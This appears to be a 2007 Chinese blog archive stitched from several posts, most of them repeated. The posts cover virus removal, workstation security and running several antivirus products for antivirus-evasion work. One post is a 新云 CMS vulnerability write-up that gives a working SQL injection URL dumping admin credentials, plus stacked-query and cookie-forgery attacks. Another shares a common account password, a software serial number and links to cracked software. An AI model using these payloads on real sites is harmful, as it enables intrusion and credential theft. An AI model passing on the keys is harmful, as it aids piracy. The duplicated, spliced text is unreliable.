一、中毒的一些表現(xiàn)
我們怎樣知道電腦中病毒了呢?其實電腦中毒跟人生病一樣,總會有一些明顯的癥狀表現(xiàn)出來。例如機器運行十分緩慢、上不了網(wǎng)、殺毒軟件生不了級、word文檔打不開,電腦不能正常啟動、硬盤分區(qū)找不到了、數(shù)據(jù)丟失等等,就是中毒的一些征兆。
二、中毒診斷
1、按Ctrl+Shift+Ese鍵(同時按此三鍵),調(diào)出windows任務(wù)管理器查看系統(tǒng)運行的進程,找出不熟悉進程并記下其名稱(這需要經(jīng)驗),如果這些進程是病毒的話,以便于后面的清除。暫時不要結(jié)束這些進程,因為有的病毒或非法的進程可能在此沒法結(jié)束。點擊性能查看CPU和內(nèi)存的當前狀態(tài),如果CPU的利用率接近100%或內(nèi)存的占用值居高不下,此時電腦中毒的可能性是95%。
2、查看windows當前啟動的服務(wù)項,由“控制面板”的“管理工具”里打開“服務(wù)”。看右欄狀態(tài)為“啟動”啟動類別為“自動”項的行;一般而言,正常的windows服務(wù),基本上是有描述內(nèi)容的(少數(shù)被駭客或蠕蟲病毒偽造的除外),此時雙擊打開認為有問題的服務(wù)項查看其屬性里的可執(zhí)行文件的路徑和名稱,假如其名稱和路徑為C:winntsystem32explored.exe,計算機中招。有一種情況是“控制面板”打不開或者是所有里面的圖標跑到左邊,中間有一縱向的滾動條,而右邊為空白,再雙擊添加/刪除程序或管理工具,窗體內(nèi)是空的,這是病毒文件winhlpp32.exe發(fā)作的特性。
3、運行注冊表編輯器,命令為regedit或regedt32,查看都有那些程序與windows一起啟動。主要看Hkey_Local_MachineSoftwareMicroSoftWindowsCurrentVersionRun和后面幾個RunOnce等,查看窗體右側(cè)的項值,看是否有非法的啟動項。WindowsXp運行msconfig也起相同的作用。隨著經(jīng)驗的積累,你可以輕易的判斷病毒的啟動項。
4、用瀏覽器上網(wǎng)判斷。前一陣發(fā)作的Gaobot病毒,可以上yahoo.com,sony.com等網(wǎng)站,但是不能訪問諸如www.symantec.com,www.ca.com這樣著名的安全廠商的網(wǎng)站,安裝了symantecNorton2004的殺毒軟件不能上網(wǎng)升級。
5、取消隱藏屬性,查看系統(tǒng)文件夾winnt(windows)system32,如果打開后文件夾為空,表明電腦已經(jīng)中毒;打開system32后,可以對圖標按類型排序,看有沒有流行病毒的執(zhí)行文件存在。順便查一下文件夾Tasks,wins,drivers.目前有的病毒執(zhí)行文件就藏身于此;driversetc下的文件hosts是病毒喜歡篡改的對象,它本來只有700字節(jié)左右,被篡改后就成了1Kb以上,這是造成一般網(wǎng)站能訪問而安全廠商網(wǎng)站不能訪問、著名殺毒軟件不能升級的原因所在。
6、由殺毒軟件判斷是否中毒,如果中毒,殺毒軟件會被病毒程序自動終止,并且手動升級失敗。
三、滅毒
1、在注冊表里刪除隨系統(tǒng)啟動的非法程序,然后在注冊表中搜索所有該鍵值,刪除之。當成系統(tǒng)服務(wù)啟動的病毒程序,會在Hkey_Local_MachineSystemControlSet001services和controlset002services里藏身,找到之后一并消滅。
2、停止有問題的服務(wù),改自動為禁止。
3、如果文件system32driversetchosts被篡改,恢復它,即只剩下一行有效值“127.0.0.1localhost”,其余的行刪除。再把host設(shè)置成只讀。
4、重啟電腦,摁F8進“帶網(wǎng)絡(luò)的安全模式”。目的是不讓病毒程序啟動,又可以對Windows升級打補丁和對殺毒軟件升級。
5、搜索病毒的執(zhí)行文件,手動消滅之。
6、對Windows升級打補丁和對殺毒軟件升級。
7、關(guān)閉不必要的系統(tǒng)服務(wù),如remoteregistryservice。
8、第6步完成后用殺毒軟件對系統(tǒng)進行全面的掃描,剿滅漏網(wǎng)之魚。
9、上步完成后,重啟計算機,完成所有操作。
還有另一種查毒的方法:
啟動好后 什也不要打開 在“開始——運行——cmd——netstat -a -n -o ”,看看有什么進程在通信 那個進程90%就是病毒或木馬了
我們怎樣知道電腦中病毒了呢?其實電腦中毒跟人生病一樣,總會有一些明顯的癥狀表現(xiàn)出來。例如機器運行十分緩慢、上不了網(wǎng)、殺毒軟件生不了級、word文檔打不開,電腦不能正常啟動、硬盤分區(qū)找不到了、數(shù)據(jù)丟失等等,就是中毒的一些征兆。
二、中毒診斷
1、按Ctrl+Shift+Ese鍵(同時按此三鍵),調(diào)出windows任務(wù)管理器查看系統(tǒng)運行的進程,找出不熟悉進程并記下其名稱(這需要經(jīng)驗),如果這些進程是病毒的話,以便于后面的清除。暫時不要結(jié)束這些進程,因為有的病毒或非法的進程可能在此沒法結(jié)束。點擊性能查看CPU和內(nèi)存的當前狀態(tài),如果CPU的利用率接近100%或內(nèi)存的占用值居高不下,此時電腦中毒的可能性是95%。
2、查看windows當前啟動的服務(wù)項,由“控制面板”的“管理工具”里打開“服務(wù)”。看右欄狀態(tài)為“啟動”啟動類別為“自動”項的行;一般而言,正常的windows服務(wù),基本上是有描述內(nèi)容的(少數(shù)被駭客或蠕蟲病毒偽造的除外),此時雙擊打開認為有問題的服務(wù)項查看其屬性里的可執(zhí)行文件的路徑和名稱,假如其名稱和路徑為C:winntsystem32explored.exe,計算機中招。有一種情況是“控制面板”打不開或者是所有里面的圖標跑到左邊,中間有一縱向的滾動條,而右邊為空白,再雙擊添加/刪除程序或管理工具,窗體內(nèi)是空的,這是病毒文件winhlpp32.exe發(fā)作的特性。
3、運行注冊表編輯器,命令為regedit或regedt32,查看都有那些程序與windows一起啟動。主要看Hkey_Local_MachineSoftwareMicroSoftWindowsCurrentVersionRun和后面幾個RunOnce等,查看窗體右側(cè)的項值,看是否有非法的啟動項。WindowsXp運行msconfig也起相同的作用。隨著經(jīng)驗的積累,你可以輕易的判斷病毒的啟動項。
4、用瀏覽器上網(wǎng)判斷。前一陣發(fā)作的Gaobot病毒,可以上yahoo.com,sony.com等網(wǎng)站,但是不能訪問諸如www.symantec.com,www.ca.com這樣著名的安全廠商的網(wǎng)站,安裝了symantecNorton2004的殺毒軟件不能上網(wǎng)升級。
5、取消隱藏屬性,查看系統(tǒng)文件夾winnt(windows)system32,如果打開后文件夾為空,表明電腦已經(jīng)中毒;打開system32后,可以對圖標按類型排序,看有沒有流行病毒的執(zhí)行文件存在。順便查一下文件夾Tasks,wins,drivers.目前有的病毒執(zhí)行文件就藏身于此;driversetc下的文件hosts是病毒喜歡篡改的對象,它本來只有700字節(jié)左右,被篡改后就成了1Kb以上,這是造成一般網(wǎng)站能訪問而安全廠商網(wǎng)站不能訪問、著名殺毒軟件不能升級的原因所在。
6、由殺毒軟件判斷是否中毒,如果中毒,殺毒軟件會被病毒程序自動終止,并且手動升級失敗。
三、滅毒
1、在注冊表里刪除隨系統(tǒng)啟動的非法程序,然后在注冊表中搜索所有該鍵值,刪除之。當成系統(tǒng)服務(wù)啟動的病毒程序,會在Hkey_Local_MachineSystemControlSet001services和controlset002services里藏身,找到之后一并消滅。
2、停止有問題的服務(wù),改自動為禁止。
3、如果文件system32driversetchosts被篡改,恢復它,即只剩下一行有效值“127.0.0.1localhost”,其余的行刪除。再把host設(shè)置成只讀。
4、重啟電腦,摁F8進“帶網(wǎng)絡(luò)的安全模式”。目的是不讓病毒程序啟動,又可以對Windows升級打補丁和對殺毒軟件升級。
5、搜索病毒的執(zhí)行文件,手動消滅之。
6、對Windows升級打補丁和對殺毒軟件升級。
7、關(guān)閉不必要的系統(tǒng)服務(wù),如remoteregistryservice。
8、第6步完成后用殺毒軟件對系統(tǒng)進行全面的掃描,剿滅漏網(wǎng)之魚。
9、上步完成后,重啟計算機,完成所有操作。
還有另一種查毒的方法:
啟動好后 什也不要打開 在“開始——運行——cmd——netstat -a -n -o ”,看看有什么進程在通信 那個進程90%就是病毒或木馬了
一系統(tǒng)安裝多殺毒軟件
[ 2007-03-25 03:50:20 | 作者: sun ]
本來、打算做教程了,一想做教程不好發(fā)表,所以就寫了這個,希望對大家有幫助
前幾天為了做免殺的需要,所以得安幾個殺毒軟件
目前比較流行的也就是江民,瑞星,金山,卡巴,這四個,其他的感覺都不怎么
地,所以不考慮了,不過在安裝的時候出現(xiàn)了一個問題,就是都裝上重起電腦之后
江民的語言選擇里面沒有簡體中文了,這個挺郁悶的,不過最郁悶的還在后面,撥
號上網(wǎng)后,QQ上不去,網(wǎng)頁打不開,PING也不通,用netstat命令查看網(wǎng)絡(luò)狀態(tài)一
看,竟然所有端口的連接都不正常,這可郁悶壞我了,重新做一次系統(tǒng),多個心眼
用GHOST做個備份(以前的也有備份,不過系統(tǒng)里裝的東西過時了```)然后試了撥
號,一切都正常,呵呵,這回先到網(wǎng)上查查看有沒有相關(guān)的資料,當然是百度了,
不過什么也沒有找到,沒這方面的問題介紹,郁悶中……
沒辦法,自己琢磨了,我們GO ON吧,這回一個一個裝,裝了江民,沒問題,
又裝了卡巴,也沒問題,又裝金山,暈,出問題了````,還是老問題,上不去網(wǎng)了
沒辦法,用GHOST恢復系統(tǒng)吧,接下來試的就別提了,試了3個多小時,最后下定了
結(jié)論,是金山的問題,思考一下,到底是什么問題呢,莫非系統(tǒng)文件沖突,那么就
少裝一些項目,裝的時候少選幾項試試,又用了1個多小時,問題終于找到了`````
原來是金山網(wǎng)標的問題,一想想,肯定是金山網(wǎng)標與其他的殺毒軟件防火墻有沖突
問題找到了,這回可以好好裝了,恢復系統(tǒng),裝殺毒軟件,終于行了~~~太興奮了`
終于成功了```下面就給大家寫一下關(guān)與安裝多個殺毒軟件的方法吧,首先必須
說明的是,安裝完一個殺毒軟件之后必須設(shè)置開機禁止啟動,因為如果電腦開機啟
動多個殺毒軟件會很卡的,而且有時候反應(yīng)很慢,更嚴重的是會引起系統(tǒng)藍屏或崩潰
建議大家最后裝卡巴,為什么?自己試試就知道了````。
江民的設(shè)置:打開主程序(KV2006),點操作臺切換,恢復窗口,工具→設(shè)置→
實時監(jiān)控,把所有開機啟動的項目全部去掉,確定。
瑞星的設(shè)置:打開主程序(瑞星殺毒軟件),設(shè)置→詳細設(shè)置→瑞星監(jiān)控中心,
把所有開機啟動的項目去掉,確定。
金山的設(shè)置:打開主程序(金山毒霸2006),工具→綜合設(shè)置→防毒設(shè)置→用戶
自定義→文件實時防毒/郵件監(jiān)控/網(wǎng)頁安全掃描(把啟動的項目的鉤去掉)確定。
在這里要說明一點,在文件實時防毒的頁面,把發(fā)現(xiàn)病毒時的處理方式改為禁止訪問
該文件,否則你的黑軟會一下子全沒了```我以前就知道,不過我朋友前一段時間就
忘了,結(jié)果可想而知了```害得他整整郁悶了一個星期~。
卡巴的設(shè)置:打開主程序(版本很多,主程序名我也不好說),設(shè)置→接下來的
自己找吧,版本太多了,每個都不一樣```我也說不清楚。
當然你要想機器平時用的方便,設(shè)置更多了,比如江民,瑞星,金山都有自帶的
小精靈,小護士,助手什么的,最好別讓他們工作,很討厭(這個詞不光女孩子能用
哦,嘿嘿~)。
接下來要提醒大家,如果是搞黑客技術(shù)的,最好用GHOST多做幾個備份(什么?
不會用GHOST?往下看吧),因為用的軟件多了裝的太多機器肯定很卡的,這點大家
應(yīng)該有同感~
至于GHOST的用法(最好自己去網(wǎng)上查,說的比較詳細),如果大家不會用DOS,
那就用矮人DOS工具箱5.0,傻瓜化的,適合對DOS不太了解的人`
這里說明大家安裝江民后出現(xiàn)的一個嚴重問題,就是每次開機都掃描硬盤,我看
過網(wǎng)上對這方面的介紹,都不全,而且有一點沒有說到,在這里說一下,解決方法是
打開江民的設(shè)置選項→掃描選項→其他動作,把四個項目的鉤都去掉(每個選項的作
用大家都能讀明白吧,我就不詳細說了),然后確定,之后打開注冊表(單擊“開始
→運行”,在“運行”對話框中輸入“regedit”打開注冊表編輯器)依次選擇
“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager”然
后在右側(cè)窗口中找到“BootExecute”鍵值項,右鍵選擇修改,里面數(shù)值是
autocheck autochk *
KvNative.exe
把KvNative.exe去掉然后點確定,F(xiàn)5刷新就可以了,以后就不會啟動江民自帶的開機
掃描了。
大家知道電腦非正常關(guān)機的情況下重起電腦以后也會開機掃描,這是很正常的,如果
以后永遠不想讓電腦開機掃描就把里面的數(shù)值全部清空,確定,F(xiàn)5刷新,就可以了
不過建議大家先備份一下注冊表再清空里面的數(shù)據(jù)(因為如果電腦經(jīng)常非正常關(guān)機而
且不開機掃描硬盤,那么會造成硬盤數(shù)據(jù)破壞后無法刪除!),不過清空了也沒關(guān)系
我們可以用chkdsk命令來強迫電腦開機掃描硬盤,至于chkdsk命令的用法大家就到網(wǎng)
上自己查吧。
最后就是免費升級殺毒軟件了
江民:通行證帳號:sphack 密碼:sphack 密碼改了我也能找回來,因為我知道
用的人多了,升級次數(shù)多了,自然就不能升級了,建議大家2天升級一次吧,還有就是
我會陸續(xù)更新新的江民通行證,請留意http://www.sphack.cn,謝謝大家支持。
瑞星:序列號: T1BULQ-70AWDE-9P90SF-7TD200?用戶ID:RB2NA22T
注意大家千萬別點自動升級,因為點自動升級之后就不能用了,大家用瑞星升級保姆
吧,這個保姆是隨時更新的,保證用戶可以免費升級~下載地址請關(guān)注天天殺毒網(wǎng)
http://www.sdday.com,這里有你想要的東東,看了絕對不后悔~
金山:天天殺毒網(wǎng)有破解版的金山2006,如果想用正版的,需要通行證和密碼,
不過由于本通行證不隨便對外公開,所以暫時不提供。
卡巴:這個好弄,網(wǎng)上到處都有下載,而且有序列號,不過建議大家到天天殺毒網(wǎng)
去下載,因為那里保證下載的東東沒問題(現(xiàn)在網(wǎng)絡(luò)可不安全,危險隨時都在),聲明
啊,我可不是給天天殺毒網(wǎng)做廣告,他可不給我任何好處,只是感覺這個網(wǎng)站有用的東
西太多了。。。
最后給計算機/網(wǎng)絡(luò)技術(shù)初學者一句話,就是遇到問題的時候別總想著去問別人,
自己養(yǎng)成用搜索引擎找答案的習慣,曾經(jīng)我記得黑客基地的一個VIP會員說過,百度是
你最好的老師~每當我遇到問題的時候,總會想起這句話。
好了,就寫這么多吧,打字打的手都酸了,GOOD LUCK !
前幾天為了做免殺的需要,所以得安幾個殺毒軟件
目前比較流行的也就是江民,瑞星,金山,卡巴,這四個,其他的感覺都不怎么
地,所以不考慮了,不過在安裝的時候出現(xiàn)了一個問題,就是都裝上重起電腦之后
江民的語言選擇里面沒有簡體中文了,這個挺郁悶的,不過最郁悶的還在后面,撥
號上網(wǎng)后,QQ上不去,網(wǎng)頁打不開,PING也不通,用netstat命令查看網(wǎng)絡(luò)狀態(tài)一
看,竟然所有端口的連接都不正常,這可郁悶壞我了,重新做一次系統(tǒng),多個心眼
用GHOST做個備份(以前的也有備份,不過系統(tǒng)里裝的東西過時了```)然后試了撥
號,一切都正常,呵呵,這回先到網(wǎng)上查查看有沒有相關(guān)的資料,當然是百度了,
不過什么也沒有找到,沒這方面的問題介紹,郁悶中……
沒辦法,自己琢磨了,我們GO ON吧,這回一個一個裝,裝了江民,沒問題,
又裝了卡巴,也沒問題,又裝金山,暈,出問題了````,還是老問題,上不去網(wǎng)了
沒辦法,用GHOST恢復系統(tǒng)吧,接下來試的就別提了,試了3個多小時,最后下定了
結(jié)論,是金山的問題,思考一下,到底是什么問題呢,莫非系統(tǒng)文件沖突,那么就
少裝一些項目,裝的時候少選幾項試試,又用了1個多小時,問題終于找到了`````
原來是金山網(wǎng)標的問題,一想想,肯定是金山網(wǎng)標與其他的殺毒軟件防火墻有沖突
問題找到了,這回可以好好裝了,恢復系統(tǒng),裝殺毒軟件,終于行了~~~太興奮了`
終于成功了```下面就給大家寫一下關(guān)與安裝多個殺毒軟件的方法吧,首先必須
說明的是,安裝完一個殺毒軟件之后必須設(shè)置開機禁止啟動,因為如果電腦開機啟
動多個殺毒軟件會很卡的,而且有時候反應(yīng)很慢,更嚴重的是會引起系統(tǒng)藍屏或崩潰
建議大家最后裝卡巴,為什么?自己試試就知道了````。
江民的設(shè)置:打開主程序(KV2006),點操作臺切換,恢復窗口,工具→設(shè)置→
實時監(jiān)控,把所有開機啟動的項目全部去掉,確定。
瑞星的設(shè)置:打開主程序(瑞星殺毒軟件),設(shè)置→詳細設(shè)置→瑞星監(jiān)控中心,
把所有開機啟動的項目去掉,確定。
金山的設(shè)置:打開主程序(金山毒霸2006),工具→綜合設(shè)置→防毒設(shè)置→用戶
自定義→文件實時防毒/郵件監(jiān)控/網(wǎng)頁安全掃描(把啟動的項目的鉤去掉)確定。
在這里要說明一點,在文件實時防毒的頁面,把發(fā)現(xiàn)病毒時的處理方式改為禁止訪問
該文件,否則你的黑軟會一下子全沒了```我以前就知道,不過我朋友前一段時間就
忘了,結(jié)果可想而知了```害得他整整郁悶了一個星期~。
卡巴的設(shè)置:打開主程序(版本很多,主程序名我也不好說),設(shè)置→接下來的
自己找吧,版本太多了,每個都不一樣```我也說不清楚。
當然你要想機器平時用的方便,設(shè)置更多了,比如江民,瑞星,金山都有自帶的
小精靈,小護士,助手什么的,最好別讓他們工作,很討厭(這個詞不光女孩子能用
哦,嘿嘿~)。
接下來要提醒大家,如果是搞黑客技術(shù)的,最好用GHOST多做幾個備份(什么?
不會用GHOST?往下看吧),因為用的軟件多了裝的太多機器肯定很卡的,這點大家
應(yīng)該有同感~
至于GHOST的用法(最好自己去網(wǎng)上查,說的比較詳細),如果大家不會用DOS,
那就用矮人DOS工具箱5.0,傻瓜化的,適合對DOS不太了解的人`
這里說明大家安裝江民后出現(xiàn)的一個嚴重問題,就是每次開機都掃描硬盤,我看
過網(wǎng)上對這方面的介紹,都不全,而且有一點沒有說到,在這里說一下,解決方法是
打開江民的設(shè)置選項→掃描選項→其他動作,把四個項目的鉤都去掉(每個選項的作
用大家都能讀明白吧,我就不詳細說了),然后確定,之后打開注冊表(單擊“開始
→運行”,在“運行”對話框中輸入“regedit”打開注冊表編輯器)依次選擇
“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager”然
后在右側(cè)窗口中找到“BootExecute”鍵值項,右鍵選擇修改,里面數(shù)值是
autocheck autochk *
KvNative.exe
把KvNative.exe去掉然后點確定,F(xiàn)5刷新就可以了,以后就不會啟動江民自帶的開機
掃描了。
大家知道電腦非正常關(guān)機的情況下重起電腦以后也會開機掃描,這是很正常的,如果
以后永遠不想讓電腦開機掃描就把里面的數(shù)值全部清空,確定,F(xiàn)5刷新,就可以了
不過建議大家先備份一下注冊表再清空里面的數(shù)據(jù)(因為如果電腦經(jīng)常非正常關(guān)機而
且不開機掃描硬盤,那么會造成硬盤數(shù)據(jù)破壞后無法刪除!),不過清空了也沒關(guān)系
我們可以用chkdsk命令來強迫電腦開機掃描硬盤,至于chkdsk命令的用法大家就到網(wǎng)
上自己查吧。
最后就是免費升級殺毒軟件了
江民:通行證帳號:sphack 密碼:sphack 密碼改了我也能找回來,因為我知道
用的人多了,升級次數(shù)多了,自然就不能升級了,建議大家2天升級一次吧,還有就是
我會陸續(xù)更新新的江民通行證,請留意http://www.sphack.cn,謝謝大家支持。
瑞星:序列號: T1BULQ-70AWDE-9P90SF-7TD200?用戶ID:RB2NA22T
注意大家千萬別點自動升級,因為點自動升級之后就不能用了,大家用瑞星升級保姆
吧,這個保姆是隨時更新的,保證用戶可以免費升級~下載地址請關(guān)注天天殺毒網(wǎng)
http://www.sdday.com,這里有你想要的東東,看了絕對不后悔~
金山:天天殺毒網(wǎng)有破解版的金山2006,如果想用正版的,需要通行證和密碼,
不過由于本通行證不隨便對外公開,所以暫時不提供。
卡巴:這個好弄,網(wǎng)上到處都有下載,而且有序列號,不過建議大家到天天殺毒網(wǎng)
去下載,因為那里保證下載的東東沒問題(現(xiàn)在網(wǎng)絡(luò)可不安全,危險隨時都在),聲明
啊,我可不是給天天殺毒網(wǎng)做廣告,他可不給我任何好處,只是感覺這個網(wǎng)站有用的東
西太多了。。。
最后給計算機/網(wǎng)絡(luò)技術(shù)初學者一句話,就是遇到問題的時候別總想著去問別人,
自己養(yǎng)成用搜索引擎找答案的習慣,曾經(jīng)我記得黑客基地的一個VIP會員說過,百度是
你最好的老師~每當我遇到問題的時候,總會想起這句話。
好了,就寫這么多吧,打字打的手都酸了,GOOD LUCK !
舉凡一般企業(yè)當中,除了一些提供網(wǎng)絡(luò)服務(wù)的服務(wù)器外,更多數(shù)的是一般工作站或可移動的筆記型計算機,亦因其數(shù)量遠遠多過于服務(wù)器主機,IT人員可以考慮制定標準的工作站安全政策,利用一些安全設(shè)定與保護機制來管理這些有潛在風險的工作站。
我們因著過去的一些經(jīng)驗,提供了一些方向給IT人員參考。
實體的安全
設(shè)定使用者授權(quán)機制:在企業(yè)的網(wǎng)絡(luò)環(huán)境里,可以設(shè)定唯有授權(quán)的使用者,方可使用企業(yè)內(nèi)部的工作站主機,另外,亦提醒使用者可以啟動屏幕保護程序限制未被授權(quán)的人無法使用,以保護工作站中所存放的數(shù)據(jù)。
設(shè)定適當?shù)拇嫒】刂茩?quán)限:對于計算機中機密或重要的檔案/目錄進行權(quán)限控制,非授權(quán)的使用者無法讀取重要的檔案,或者亦可考慮利用密碼保護功能進行控制。
制定計算機硬件的安裝機制:可移動式的儲存設(shè)備愈來愈普遍化,但隨著愈方便地使用亦愈容易成為漏洞的所在,IT人員可以考慮制定硬件管理的機制。
系統(tǒng)的安全設(shè)定
重視軟件相關(guān)的安全修補程序:注意軟件開發(fā)廠商提供的修補程序,并確實執(zhí)行修補作業(yè)。
安裝防毒軟件并定期更新病毒碼及引擊:利用防毒軟件進行病毒的防護機制,并確實更新程序,以達到有效的預防。
遠程管理的安全性:遠程管理工具提供給IT人員一個便利的管道來管理企業(yè)中的計算機,但可能一不小心便成為黑客的后門,IT人員需特別注意。
減少不必要的應(yīng)用程序:這點是老生常談了,在工作站上只要有不必要的應(yīng)用程序,就將它移除或停止啟動。
數(shù)據(jù)的保護
定期執(zhí)行備份工作:工作站上重要的檔案需定期執(zhí)行備份或者將檔案備份到企業(yè)的檔案伺服主機。
知識的傳達
提升使用者對安全的認知:因為并非每個使用者都有IT人員的專業(yè)資安概念,所以,IT人員可善用一些機會,給予一般使用者信息安全的認知與概念。
善用工作站管理程序,統(tǒng)一管理企業(yè)計算機軟硬件:對于IT人員,可以善用管理程序來管理企業(yè)內(nèi)部的軟硬件,找出是否有工作站安裝了未經(jīng)授權(quán)的軟件,或執(zhí)行不安全的軟件。
不隨意下載或執(zhí)行來源不明的檔案或程序:提醒每個使用者不要執(zhí)行來路不明的程序,減少一些資安上的風險。
透過 DragonSoft Secure Scanner(DSS) 檢查您企業(yè)中的工作站是否安裝或啟動哪些未經(jīng)授權(quán)的軟件。
進行一個安全檢測,并采用"一般檢測"政策,檢測目標選擇您欲檢查的主機,您可以分不同部門來進行檢測作業(yè),屆時針對不同部門給予建議等。
按下工具列上的開始按鈕進行檢測。
檢測完成后,按下工具列上的報表按鈕,進行報表產(chǎn)生。
報表產(chǎn)生后,其中一部份就是記錄著被檢測主機上的服務(wù)信息,依著報告您即可提醒公司內(nèi)部人員,進行修正,以符合公司所訂定的安全政策。
我們因著過去的一些經(jīng)驗,提供了一些方向給IT人員參考。
實體的安全
設(shè)定使用者授權(quán)機制:在企業(yè)的網(wǎng)絡(luò)環(huán)境里,可以設(shè)定唯有授權(quán)的使用者,方可使用企業(yè)內(nèi)部的工作站主機,另外,亦提醒使用者可以啟動屏幕保護程序限制未被授權(quán)的人無法使用,以保護工作站中所存放的數(shù)據(jù)。
設(shè)定適當?shù)拇嫒】刂茩?quán)限:對于計算機中機密或重要的檔案/目錄進行權(quán)限控制,非授權(quán)的使用者無法讀取重要的檔案,或者亦可考慮利用密碼保護功能進行控制。
制定計算機硬件的安裝機制:可移動式的儲存設(shè)備愈來愈普遍化,但隨著愈方便地使用亦愈容易成為漏洞的所在,IT人員可以考慮制定硬件管理的機制。
系統(tǒng)的安全設(shè)定
重視軟件相關(guān)的安全修補程序:注意軟件開發(fā)廠商提供的修補程序,并確實執(zhí)行修補作業(yè)。
安裝防毒軟件并定期更新病毒碼及引擊:利用防毒軟件進行病毒的防護機制,并確實更新程序,以達到有效的預防。
遠程管理的安全性:遠程管理工具提供給IT人員一個便利的管道來管理企業(yè)中的計算機,但可能一不小心便成為黑客的后門,IT人員需特別注意。
減少不必要的應(yīng)用程序:這點是老生常談了,在工作站上只要有不必要的應(yīng)用程序,就將它移除或停止啟動。
數(shù)據(jù)的保護
定期執(zhí)行備份工作:工作站上重要的檔案需定期執(zhí)行備份或者將檔案備份到企業(yè)的檔案伺服主機。
知識的傳達
提升使用者對安全的認知:因為并非每個使用者都有IT人員的專業(yè)資安概念,所以,IT人員可善用一些機會,給予一般使用者信息安全的認知與概念。
善用工作站管理程序,統(tǒng)一管理企業(yè)計算機軟硬件:對于IT人員,可以善用管理程序來管理企業(yè)內(nèi)部的軟硬件,找出是否有工作站安裝了未經(jīng)授權(quán)的軟件,或執(zhí)行不安全的軟件。
不隨意下載或執(zhí)行來源不明的檔案或程序:提醒每個使用者不要執(zhí)行來路不明的程序,減少一些資安上的風險。
透過 DragonSoft Secure Scanner(DSS) 檢查您企業(yè)中的工作站是否安裝或啟動哪些未經(jīng)授權(quán)的軟件。
進行一個安全檢測,并采用"一般檢測"政策,檢測目標選擇您欲檢查的主機,您可以分不同部門來進行檢測作業(yè),屆時針對不同部門給予建議等。
按下工具列上的開始按鈕進行檢測。
檢測完成后,按下工具列上的報表按鈕,進行報表產(chǎn)生。
報表產(chǎn)生后,其中一部份就是記錄著被檢測主機上的服務(wù)信息,依著報告您即可提醒公司內(nèi)部人員,進行修正,以符合公司所訂定的安全政策。
新云網(wǎng)站管理系統(tǒng)文件注入漏洞
[ 2007-03-25 03:49:51 | 作者: sun ]
關(guān)于新云
新云網(wǎng)絡(luò)成立于2002年,是一家提供現(xiàn)代網(wǎng)絡(luò)服務(wù)、軟件開發(fā)的網(wǎng)絡(luò)公司,主要從事網(wǎng)絡(luò)應(yīng)用軟件開發(fā)、電子商務(wù)系統(tǒng)開發(fā),程序訂制、網(wǎng)站開發(fā)、網(wǎng)站策劃、域名注冊、空間租用等多項業(yè)務(wù),為企業(yè)打造卓越的網(wǎng)絡(luò)應(yīng)用平臺。
漏洞原理
利用各種方法實現(xiàn)入侵,如COOKIES、抓包、注入檢測等。
1.過濾未全
user\articlepost.asp 文件第333行
Quote
SQL = "select ArticleID,title,content,ColorMode,FontMode,Author,ComeFrom,
WriteTime,username from NC_Article where ChannelID=" & ChannelID & " And
username=’" & Newasp.MemberName & "’
And ArticleID=" & Request("ArticleID")
沒有任何過濾,只有用戶是否有權(quán)限發(fā)文章的檢查。綜合代碼原理可構(gòu)造URL語句:
articlepost.asp?ChannelID=1&action=view&ArticleID=1%20union%20select%
201,2,3,4,5,username,password,8,9%20from%20nc_admin
注冊后直接在瀏覽器上輸入,就可以爆出管理員的表和代碼。
2.新云2.1SQL版注入漏洞
漏洞描述:
動畫頻道的“動畫管理”和“審核管理”,錯誤類型:
Quote
Microsoft OLE DB Provider for SQL Server (0x80040E14)
未能找到存儲過程 ’NC_FlashAdminList’。
/admin/admin_Flash.asp, 第 233 行
可以利用SQL注入方法,手工&工具,這個就不用我教了吧。如:
articlepost.asp?ChannelID=1&action=view&ArticleID=1;--
3.COOKIES欺騙獲取管理賬號
攻擊者只需使用WSockExpert等工具抓包修改資料時的信息,編輯用戶名及ID信息后用NC提交即可修改指定的用戶信息。
新云網(wǎng)絡(luò)成立于2002年,是一家提供現(xiàn)代網(wǎng)絡(luò)服務(wù)、軟件開發(fā)的網(wǎng)絡(luò)公司,主要從事網(wǎng)絡(luò)應(yīng)用軟件開發(fā)、電子商務(wù)系統(tǒng)開發(fā),程序訂制、網(wǎng)站開發(fā)、網(wǎng)站策劃、域名注冊、空間租用等多項業(yè)務(wù),為企業(yè)打造卓越的網(wǎng)絡(luò)應(yīng)用平臺。
漏洞原理
利用各種方法實現(xiàn)入侵,如COOKIES、抓包、注入檢測等。
1.過濾未全
user\articlepost.asp 文件第333行
Quote
SQL = "select ArticleID,title,content,ColorMode,FontMode,Author,ComeFrom,
WriteTime,username from NC_Article where ChannelID=" & ChannelID & " And
username=’" & Newasp.MemberName & "’
And ArticleID=" & Request("ArticleID")
沒有任何過濾,只有用戶是否有權(quán)限發(fā)文章的檢查。綜合代碼原理可構(gòu)造URL語句:
articlepost.asp?ChannelID=1&action=view&ArticleID=1%20union%20select%
201,2,3,4,5,username,password,8,9%20from%20nc_admin
注冊后直接在瀏覽器上輸入,就可以爆出管理員的表和代碼。
2.新云2.1SQL版注入漏洞
漏洞描述:
動畫頻道的“動畫管理”和“審核管理”,錯誤類型:
Quote
Microsoft OLE DB Provider for SQL Server (0x80040E14)
未能找到存儲過程 ’NC_FlashAdminList’。
/admin/admin_Flash.asp, 第 233 行
可以利用SQL注入方法,手工&工具,這個就不用我教了吧。如:
articlepost.asp?ChannelID=1&action=view&ArticleID=1;--
3.COOKIES欺騙獲取管理賬號
攻擊者只需使用WSockExpert等工具抓包修改資料時的信息,編輯用戶名及ID信息后用NC提交即可修改指定的用戶信息。
避免網(wǎng)絡(luò)IP地址被非法修改
[ 2007-03-25 03:49:39 | 作者: sun ]
局域網(wǎng)中各工作站的TCP/IP參數(shù)被隨意修改后,很容易造成IP地址的沖突,這會給管理工作帶來不小的麻煩。那么,有沒有辦法保護好自己的網(wǎng)絡(luò),不讓別人非法修改IP地址呢?
其實,很簡單,你只要參照下面的步驟,就能輕松避免IP地址被非法修改的麻煩!
注冊表設(shè)置法
首先,需要將桌面上的“網(wǎng)上鄰居”圖標隱藏起來,讓其他人無法通過“網(wǎng)上鄰居”屬性窗口,進入到TCP/IP參數(shù)設(shè)置界面。依次展開注冊表編輯窗口中的“HKEY_CURRENT_USER”、“Software”、“Microsoft”、“ Windows”、“CurrentVersion”、“Policies”、“Explorer”子鍵,然后在“Explorer”子鍵下面,創(chuàng)建一名為“NoNetHood”雙字節(jié)值,并將它設(shè)置為“1”,就可以了。
